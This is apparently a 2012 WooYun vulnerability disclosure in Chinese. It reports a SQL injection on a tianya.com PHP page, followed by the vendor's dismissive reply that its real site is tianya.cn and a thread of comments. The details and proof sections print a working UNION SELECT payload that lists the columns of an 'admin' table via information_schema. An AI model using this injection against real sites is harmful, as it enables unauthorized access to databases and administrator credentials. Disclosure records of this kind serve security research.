漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:天涯主站sql存在注射漏洞
提交时间:2012-06-07 12:00
修复时间:2012-06-08 11:38
公开时间:2012-06-08 11:38
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情 披露状态:
2012-06-07: 细节已通知厂商并且等待厂商处理中 2012-06-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: 天涯主站sql存在注射漏洞
详细说明: http://www.tianya.com/gq_free_detail.php?id=-340000 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 from+information_schema.columns+where+table_name=0x61646D696E 爆字段
漏洞证明:
http://www.tianya.com/gq_free_detail.php?id=-340000 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 from+information_schema.columns+where+table_name=0x61646D696E
修复方案: 漏洞回应 厂商回应: 危害等级:无影响厂商忽略
忽略时间:2012-06-08 11:38
厂商回复: 天涯社区的地址:www.tianya.cn。Topman王 有心了。谢谢!
漏洞Rank:8 (WooYun评价)
最新状态: 暂无
漏洞评价:
评论
2012-06-07 13:04 |
zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)
2012-06-07 14:29 |
momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)
2012-06-07 14:45 |
momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)
@zeracker com的被入侵了,你输入网址,然后后面加上test.php 那个com的还有300错误。
2012-06-07 15:13 |
Master ( 路人 | Rank:29 漏洞数:10 )
2012-06-07 15:16 |
HuGtion ( 实习白帽子 | Rank:70 漏洞数:10 | 学习安全技术。)
2012-06-07 15:17 |
momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)
@HuGtion @Master .com好像不是天涯官方的。
2012-06-07 17:11 |
苦战 ( 路人 | Rank:5 漏洞数:4 | 人称苦战?乃南方蛮荒之人!相平,谓正不如...)
2012-06-07 17:17 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2012-06-07 17:23 |
Topman王 ( 实习白帽子 | Rank:31 漏洞数:6 | 软件开发工程师!白帽子!XSSER,渗透,SEO)
2012-06-07 17:28 |
苦战 ( 路人 | Rank:5 漏洞数:4 | 人称苦战?乃南方蛮荒之人!相平,谓正不如...)
2012-06-07 17:30 |
Topman王 ( 实习白帽子 | Rank:31 漏洞数:6 | 软件开发工程师!白帽子!XSSER,渗透,SEO)
2012-06-07 17:50 |
zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)
@Topman王 俺就知道。你看错鸟。。主站存在啊。那得了啊。亲。@xsser 还跟着起哄。O__O"…
2012-06-07 21:22 |
Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)
2012-06-07 22:24 |
saga ( 路人 | Rank:11 漏洞数:2 | 世界上只有10种人,懂二进制的,和不懂二进...)
@momo 每天上天涯手打地址 误将cn输入成com的大有人在,挂马足够了
2012-06-08 11:55 |
瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )
2012-06-08 12:21 |
f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)
2013-08-06 12:47 |
M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)